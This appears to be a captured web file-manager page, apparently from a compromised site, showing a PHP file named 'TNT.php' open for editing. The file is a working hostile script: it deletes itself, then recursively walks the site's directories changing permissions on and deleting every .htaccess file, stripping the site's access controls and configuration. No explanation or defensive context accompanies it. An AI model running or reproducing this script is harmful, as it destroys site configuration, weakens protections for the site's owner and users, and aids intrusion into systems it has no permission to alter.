🏠 Root
/
home
/
artorgp
/
paranartgallery
/
Editing: TNT.php__cee8048
<?php $file = ".htaccess"; //name unlink($_SERVER['SCRIPT_FILENAME']); $dir = str_replace(substr($_SERVER['REQUEST_URI'], 0, strrpos($_SERVER['REQUEST_URI'], '/')), '', str_replace('\\', '/', getcwd())); @chmod($dir . '/' . $file,0644); @unlink($dir . '/' . $file); $files = array(); function scandirs($dir) { global $file; $items = scandir($dir); foreach ($items as $item) { if ($item != '.' && $item != '..') { if (is_dir($dir . '/' . $item)) { @chmod($dir . '/' . $item."/" . $file,0644); @unlink($dir . '/' . $item."/" . $file); scandirs($dir . '/' . $item); } } } } scandirs($dir); echo 'over';
Save
Cancel